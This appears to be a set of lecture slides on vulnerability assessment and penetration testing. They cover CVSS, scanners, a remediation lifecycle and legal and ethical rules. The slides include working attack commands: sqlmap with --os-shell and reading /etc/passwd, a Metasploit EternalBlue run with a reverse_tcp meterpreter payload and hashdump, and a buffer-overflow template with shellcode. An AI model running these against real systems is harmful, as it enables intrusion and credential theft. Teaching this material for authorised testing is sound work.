Author: Milav Dabgar
Vulnerability Scanning and Exploitation

Identifying and Exploiting System Weaknesses

Comprehensive Security Assessment and Penetration Testing

Port Scanning in Ethical Hacking

Vulnerability Assessment Overview

Vulnerability Assessment: The systematic identification, analysis, and evaluation of security weaknesses in systems, networks, and applications to determine potential attack vectors and security risks.

Core Components:

  • Discovery: Identifying systems, services, and applications
  • Scanning: Automated vulnerability detection
  • Analysis: Evaluating vulnerability severity and impact
  • Prioritization: Risk-based vulnerability ranking
  • Reporting: Comprehensive findings documentation
  • Remediation: Providing fix recommendations
Purpose: Enable organizations to proactively identify and address security weaknesses before they can be exploited by attackers

Vulnerability vs Exploit

Vulnerability:

  • Definition: A weakness or flaw in a system
  • Nature: Passive security gap
  • Examples: Missing patches, misconfigurations
  • Discovery: Through scanning and analysis
  • Risk: Potential for compromise
  • Action: Requires identification and remediation

Exploit:

  • Definition: Code or technique that leverages vulnerability
  • Nature: Active attack mechanism
  • Examples: Malware, attack scripts, techniques
  • Discovery: Through research and development
  • Risk: Actual compromise execution
  • Action: Used to gain unauthorized access
Relationship Example:
Vulnerability: Unpatched Apache Struts framework (CVE-2017-5638)
Exploit: Malicious HTTP request exploiting deserialization flaw
Impact: Remote code execution on vulnerable web application

Vulnerability Types and Classifications

Software Vulnerabilities:

  • Buffer overflow attacks
  • SQL injection flaws
  • Cross-site scripting (XSS)
  • Authentication bypass
  • Privilege escalation
  • Input validation errors

Network Vulnerabilities:

  • Open ports and services
  • Protocol weaknesses
  • Default credentials
  • Weak encryption
  • Network misconfigurations
  • Unsecured communications

System Vulnerabilities:

  • Missing security patches
  • Weak access controls
  • System misconfigurations
  • Kernel vulnerabilities
  • Service account issues
  • File system permissions

Severity Classifications:

  • Critical (9.0-10.0): Immediate exploitation risk, system compromise
  • High (7.0-8.9): Significant risk, potential for major impact
  • Medium (4.0-6.9): Moderate risk, limited impact
  • Low (0.1-3.9): Minor risk, minimal impact
  • Informational (0.0): No direct security impact

Common Vulnerability Scoring System (CVSS)

CVSS: Industry standard framework for rating the severity of security vulnerabilities, providing quantitative severity scores from 0.0 to 10.0.

Base Metrics:

  • Attack Vector (AV): Network, Adjacent, Local, Physical
  • Attack Complexity (AC): Low, High
  • Privileges Required (PR): None, Low, High
  • User Interaction (UI): None, Required
  • Scope (S): Unchanged, Changed
  • Impact: Confidentiality, Integrity, Availability

Temporal and Environmental:

  • Exploit Code Maturity: Proof-of-concept availability
  • Remediation Level: Patch availability
  • Report Confidence: Verification level
  • Modified Base Metrics: Environment-specific adjustments
  • Collateral Damage: Secondary impact
  • Target Distribution: System prevalence
CVSS Score Example:
CVE-2017-0144 (EternalBlue/WannaCry)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Score: 9.3 (Critical)
Vector: Network accessible, Low complexity, No privileges required

Vulnerability Scanning Process

Systematic Approach: Vulnerability scanning follows a structured methodology to ensure comprehensive coverage and accurate results.
Scanning Workflow:

1. Planning and Preparation:
• Define scope and objectives
• Identify target systems and networks
• Obtain necessary authorizations
• Select appropriate scanning tools
• Schedule scanning activities

2. Discovery and Asset Identification:
• Network discovery and host enumeration
• Port scanning and service detection
• Operating system fingerprinting
• Application and service version identification
• Asset inventory creation

3. Vulnerability Detection:
• Automated vulnerability scanning
• Signature-based detection
• Behavioral analysis
• Configuration assessment
• Patch level verification

4. Analysis and Validation:
• False positive elimination
• Vulnerability verification
• Risk assessment and prioritization
• Impact analysis
• Exploitability evaluation

5. Reporting and Remediation:
• Comprehensive vulnerability reports
• Risk-based prioritization
• Remediation recommendations
• Executive and technical summaries
• Tracking and follow-up procedures

Vulnerability Scanning Tools

Commercial Scanners:

  • Nessus: Comprehensive vulnerability scanner
  • Qualys VMDR: Cloud-based vulnerability management
  • Rapid7 Nexpose: Vulnerability risk management
  • IBM Security AppScan: Application security testing
  • Veracode: Application security platform

Open Source Tools:

  • OpenVAS: Full-featured vulnerability scanner
  • Nikto: Web server security scanner
  • OWASP ZAP: Web application security testing
  • Nuclei: Fast and customizable scanner
  • Lynis: Security auditing and compliance

Specialized Scanners:

  • Nmap: Network discovery and security auditing
  • SQLmap: SQL injection detection and exploitation
  • Burp Suite: Web application security testing
  • Metasploit: Penetration testing framework
  • Acunetix: Web application vulnerability scanner

Tool Selection Criteria:

  • Scope Coverage: Network, web, database, mobile capabilities
  • Accuracy: Low false positive rates
  • Performance: Scanning speed and resource efficiency
  • Reporting: Comprehensive and actionable reports
  • Integration: API and third-party tool compatibility
  • Cost: Licensing and operational expenses

OpenVAS Configuration and Usage

OpenVAS: Open source vulnerability assessment system providing comprehensive vulnerability testing and management capabilities.
OpenVAS Installation and Setup:

# Install OpenVAS on Kali Linux
sudo apt update
sudo apt install openvas

# Setup and configure OpenVAS
sudo gvm-setup
sudo gvm-check-setup

# Start OpenVAS services
sudo gvm-start

# Access web interface
https://localhost:9392

# Create scan target
• Navigate to Configuration → Targets
• Click "New Target" icon
• Enter target name and hosts
• Configure credentials if needed

# Create and run scan
• Go to Scans → Tasks
• Click "New Task" icon
• Select scan config and target
• Start the scan task

# Review results
• Monitor scan progress
• View detailed vulnerability reports
• Export reports in various formats
• Generate executive summaries

Nessus Professional Scanning

Nessus: Industry-leading vulnerability scanner with extensive plugin library and advanced scanning capabilities.
Nessus Setup and Scanning:

# Download and install Nessus
# Download the .deb for your platform from https://www.tenable.com/downloads/nessus
sudo dpkg -i Nessus-x.x.x-debian6_amd64.deb

# Start Nessus service
sudo systemctl enable nessusd
sudo systemctl start nessusd

# Access web interface
https://localhost:8834

# Create new scan
• Select scan template (Basic Network Scan, Web Application Tests)
• Configure scan settings and targets
• Set credentials for authenticated scanning
• Schedule or launch scan immediately

# Advanced scan configurations
• Custom scan policies
• Plugin family selection
• Performance tuning
• Compliance auditing
• Credentialed vs. non-credentialed scans

# Results analysis
• Vulnerability severity distribution
• Host-based vulnerability details
• Plugin output and solutions
• Executive dashboard reports
• Remediation project creation

Web Application Vulnerability Scanning

Web App Security: Specialized scanning techniques for identifying vulnerabilities in web applications and services.

OWASP ZAP Usage:

  • Proxy Setup: Configure browser proxy
  • Spider/Crawl: Discover application structure
  • Active Scan: Automated vulnerability detection
  • Manual Testing: Interactive security testing
  • API Testing: REST/SOAP service scanning
  • Authentication: Session-based testing

Nikto Web Scanner:

  • Server Scanning: Web server vulnerability detection
  • CGI Scanning: Common Gateway Interface testing
  • SSL Testing: Certificate and configuration analysis
  • Database: Comprehensive vulnerability database
  • Reporting: Multiple output formats
  • Plugins: Extensible test framework
Web Application Scanning Commands:

# Nikto web server scanning
nikto -h http://target.com
nikto -h https://target.com -ssl -port 443
nikto -h target.com -output report.html -Format htm

# OWASP ZAP automated scanning
zap-baseline.py -t http://target.com
zap-full-scan.py -t http://target.com

# Dirb directory enumeration
dirb http://target.com
dirb http://target.com /usr/share/wordlists/dirb/big.txt

# Gobuster directory brute forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

Database Vulnerability Assessment

Database Security: Specialized techniques for identifying vulnerabilities in database systems and configurations.

Database Scanners:

  • SQLmap: SQL injection detection and exploitation
  • NoSQLMap: NoSQL injection testing
  • Oscanner: Oracle database assessment
  • BBQSQL: Blind SQL injection framework
  • jSQL Injection: Java-based SQL injection tool

Database Vulnerabilities:

  • SQL injection vulnerabilities
  • Default or weak passwords
  • Missing security patches
  • Excessive user privileges
  • Unencrypted data transmission
  • Weak authentication mechanisms

Testing Techniques:

  • Automated injection testing
  • Authentication bypass attempts
  • Privilege escalation testing
  • Data extraction verification
  • Configuration assessment
  • Access control validation
SQLmap Usage Examples:

# Basic SQL injection testing
sqlmap -u "http://target.com/page.php?id=1"

# POST request testing
sqlmap -r request.txt --batch

# Database enumeration
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" -D database -T table --dump

# Advanced techniques
sqlmap -u "http://target.com/page.php?id=1" --os-shell
sqlmap -u "http://target.com/page.php?id=1" --file-read=/etc/passwd

Vulnerability Exploitation Process

Exploitation: The process of leveraging identified vulnerabilities to gain unauthorized access or demonstrate security impact.
Exploitation Methodology:

1. Vulnerability Verification:
• Confirm vulnerability existence
• Validate scanner findings
• Eliminate false positives
• Assess exploitability

2. Exploit Research and Development:
• Search for existing exploits
• Analyze vulnerability details
• Develop proof-of-concept code
• Test exploit reliability

3. Exploit Execution:
• Prepare target environment
• Execute exploit payload
• Verify successful exploitation
• Document exploitation process

4. Post-Exploitation Activities:
• Establish persistent access
• Escalate privileges
• Gather evidence of compromise
• Assess lateral movement opportunities

5. Impact Documentation:
• Capture exploitation evidence
• Document business impact
• Create remediation timeline
• Prepare executive briefing

Metasploit Exploitation Framework

Metasploit: Comprehensive penetration testing platform providing exploit development, execution, and post-exploitation capabilities.
Metasploit Exploitation Workflow:

# Start Metasploit console
msfconsole

# Search for exploits
msf6 > search cve:2017-0144
msf6 > search type:exploit platform:windows smb

# Select and configure exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100

# Configure payload
msf6 exploit(ms17_010_eternalblue) > show payloads
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444

# Execute exploit
msf6 exploit(ms17_010_eternalblue) > check
msf6 exploit(ms17_010_eternalblue) > exploit

# Post-exploitation commands
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > screenshot
meterpreter > shell

Manual Exploitation Techniques

Buffer Overflow Exploitation:

  • Vulnerability Analysis: Identify buffer overflow conditions
  • Fuzzing: Generate malicious input patterns
  • Offset Calculation: Determine EIP overwrite point
  • Shellcode Development: Create payload execution code
  • Exploit Chaining: Bypass modern protections

Web Exploitation:

  • SQL Injection: Database query manipulation
  • XSS Exploitation: Client-side code injection
  • CSRF Attacks: Cross-site request forgery
  • File Upload: Malicious file execution
  • Authentication Bypass: Login mechanism circumvention

Network Service Exploitation:

  • Service Enumeration: Detailed service fingerprinting
  • Protocol Attacks: Network protocol vulnerabilities
  • Default Credentials: Weak authentication exploitation
  • Service Exploits: Application-specific vulnerabilities
  • Privilege Escalation: Local and remote privilege elevation
  • Lateral Movement: Network propagation techniques

Exploit Development Fundamentals

Exploit Development: The process of creating reliable code that leverages vulnerabilities to achieve specific security objectives.

Development Tools:

  • Debuggers: GDB, WinDbg, Immunity
  • Disassemblers: IDA Pro, Ghidra, Radare2
  • Fuzzers: AFL, Peach, Spike
  • Hex Editors: HxD, Bless, xxd
  • Compilers: GCC, MSVC, NASM

Exploit Components:

  • Trigger: Vulnerability activation code
  • Payload: Code executed after exploitation
  • NOP Sled: Instruction padding for reliability
  • Return Address: Control flow redirection
  • Shellcode: Assembly payload instructions

Protection Bypasses:

  • ASLR: Address Space Layout Randomization
  • DEP/NX: Data Execution Prevention
  • Stack Canaries: Stack overflow protection
  • Control Flow Integrity: CFI bypasses
  • SMEP/SMAP: Kernel protection mechanisms
Basic Buffer Overflow Exploit Structure:

#!/usr/bin/python3
import struct

# Buffer overflow exploit template (32-bit x86 stack layout)
buffer_size = 1024
offset = 268  # EIP overwrite offset, determined by fuzzing / pattern offset

# Shellcode (example: 28-byte x86 Linux execve("/bin//sh") shellcode that
# spawns a local shell and exits; it is not a reverse shell)
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80")

# Return address (JMP ESP or RET instruction), packed little-endian 32-bit.
# The slide's actual address was lost in extraction; 0x41414141 is a placeholder.
ret_addr = struct.pack("<I", 0x41414141)

# Construct exploit payload
padding = b"A" * (offset - len(shellcode))
exploit = padding + shellcode + ret_addr

print(f"Exploit payload length: {len(exploit)}")

Post-Exploitation Activities

Post-Exploitation: Activities performed after successful exploitation to maximize impact assessment and demonstrate security risks.

Information Gathering:

  • System Information: OS, architecture, patches
  • User Accounts: Local and domain users
  • Network Configuration: Interfaces, routes, services
  • Installed Software: Applications and versions
  • Running Processes: Active services and applications
  • File System: Sensitive files and directories

Privilege Escalation:

  • Local Exploits: Kernel and application vulnerabilities
  • Misconfiguration: Weak file permissions
  • Service Accounts: High-privilege service abuse
  • Scheduled Tasks: Task hijacking techniques
  • Registry Manipulation: Windows registry abuse
  • Sudo/SUID: Unix privilege escalation

Persistence and Lateral Movement:

  • Backdoor Installation: Persistent access mechanisms
  • Credential Harvesting: Password and hash collection
  • Network Pivoting: Internal network exploration
  • Lateral Movement: Spreading to additional systems
  • Data Exfiltration: Sensitive information extraction
  • Covert Channels: Stealthy communication methods

Vulnerability Management Lifecycle

Continuous Process: Vulnerability management is an ongoing cycle of identification, assessment, remediation, and verification.
VM Lifecycle Phases:

1. Asset Discovery and Inventory:
• Network asset identification
• Service and application mapping
• Asset categorization and prioritization
• Inventory database maintenance

2. Vulnerability Assessment:
• Regular automated scanning
• Manual security testing
• Threat intelligence integration
• Risk-based vulnerability scoring

3. Risk Analysis and Prioritization:
• Business impact assessment
• Exploitability evaluation
• Asset criticality weighting
• Remediation timeline planning

4. Remediation and Mitigation:
• Patch management deployment
• Configuration hardening
• Compensating controls implementation
• Emergency response procedures

5. Verification and Reporting:
• Remediation validation scanning
• Risk reduction measurement
• Executive reporting and dashboards
• Compliance verification

6. Continuous Monitoring:
• Real-time vulnerability detection
• Threat landscape monitoring
• Process improvement
• Lessons learned integration
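An added example, not from the lecture, of the verification phase in code: it compares a baseline scan with a re-scan to list what was remediated, what persists and what is new, and measures how much the summed CVSS risk fell. The findings and plugin identifiers below are constructed samples.

```python
from dataclasses import dataclass

# Remediation-verification check: added example, not from the lecture.
# Findings below are constructed samples; plugin ids are placeholders.


@dataclass(frozen=True)
class Finding:
    host: str
    plugin_id: str
    cvss: float


BASELINE_SCAN = [
    Finding("10.0.0.5", "PLUGIN-001", 9.8),
    Finding("10.0.0.5", "PLUGIN-002", 5.3),
    Finding("10.0.0.7", "PLUGIN-001", 9.8),
    Finding("10.0.0.7", "PLUGIN-003", 7.5),
]
RESCAN = [
    Finding("10.0.0.5", "PLUGIN-002", 5.3),
    Finding("10.0.0.7", "PLUGIN-003", 7.5),
    Finding("10.0.0.7", "PLUGIN-004", 8.8),  # appeared since the baseline
]


def compare_scans(baseline, rescan):
    """Classify findings by (host, plugin) and measure risk-score change."""
    before = {(f.host, f.plugin_id) for f in baseline}
    after = {(f.host, f.plugin_id) for f in rescan}
    risk_before = sum(f.cvss for f in baseline)
    risk_after = sum(f.cvss for f in rescan)
    reduction = 0.0
    if risk_before > 0:
        reduction = round(100 * (risk_before - risk_after) / risk_before, 1)
    return {
        "remediated": sorted(before - after),
        "persisting": sorted(before & after),
        "new": sorted(after - before),
        "risk_before": round(risk_before, 1),
        "risk_after": round(risk_after, 1),
        "risk_reduction_pct": reduction,
    }


def open_high_risk(rescan, min_cvss=7.0):
    """Findings still open after the re-scan that need follow-up, worst first."""
    hot = [f for f in rescan if f.cvss >= min_cvss]
    return sorted(hot, key=lambda f: (-f.cvss, f.host, f.plugin_id))


if __name__ == "__main__":
    result = compare_scans(BASELINE_SCAN, RESCAN)
    print(f"remediated: {result['remediated']}")
    print(f"persisting: {result['persisting']}")
    print(f"new:        {result['new']}")
    print(f"risk {result['risk_before']} -> {result['risk_after']} "
          f"({result['risk_reduction_pct']}% reduction)")
    for f in open_high_risk(RESCAN):
        print(f"follow up: {f.host} {f.plugin_id} cvss={f.cvss}")
```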

Vulnerability Remediation Strategies

Elimination:

  • Apply security patches
  • Update software versions
  • Remove vulnerable services
  • Disable unused features
  • Replace vulnerable systems
  • Code fixes for custom applications

Mitigation:

  • Network segmentation
  • Access control restrictions
  • Web Application Firewalls (WAF)
  • Intrusion Prevention Systems
  • Configuration hardening
  • Monitoring and alerting

Acceptance:

  • Business risk acceptance
  • Cost-benefit analysis
  • Compensating controls
  • Insurance coverage
  • Regular reassessment
  • Incident response preparation

Prioritization Framework:

  • Critical Assets First: Protect high-value systems
  • Exploit Availability: Address publicly available exploits
  • CVSS Scores: Focus on high-severity vulnerabilities
  • Attack Surface: Prioritize external-facing systems
  • Business Impact: Consider operational dependencies
  • Compliance Requirements: Meet regulatory obligations

Legal and Ethical Considerations

Responsible Testing: Vulnerability scanning and exploitation must be conducted within legal and ethical boundaries with proper authorization.

Legal Requirements:

  • Written Authorization: Explicit permission from system owners
  • Scope Definition: Clear testing boundaries and limitations
  • Data Protection: Privacy and confidentiality safeguards
  • Incident Procedures: Emergency response protocols
  • Evidence Handling: Proper documentation and chain of custody

Ethical Guidelines:

  • Minimal Impact: Avoid system damage or disruption
  • Responsible Disclosure: Timely vulnerability reporting
  • Professional Conduct: Industry standards compliance
  • Confidentiality: Protect sensitive information
  • Continuous Education: Stay current with best practices

Best Practices:

  • Staging Environments: Test in non-production systems when possible
  • Time Windows: Schedule testing during maintenance windows
  • Communication: Maintain regular stakeholder updates
  • Documentation: Keep detailed records of all activities
  • Professional Insurance: Maintain liability coverage
  • Regulatory Compliance: Adhere to industry-specific requirements

Key Takeaways

  • Vulnerability assessment is a systematic process requiring proper tools and methodology
  • CVSS scoring provides standardized vulnerability severity assessment
  • Multiple scanning tools are needed for comprehensive vulnerability coverage
  • Manual validation is essential to eliminate false positives
  • Exploitation demonstrates real-world impact and risk
  • Post-exploitation activities reveal full security impact
  • Vulnerability management is an ongoing lifecycle process
  • Legal authorization and ethical guidelines must always be followed
Remember: Vulnerability scanning and exploitation are powerful techniques that must be used responsibly with proper authorization to improve organizational security
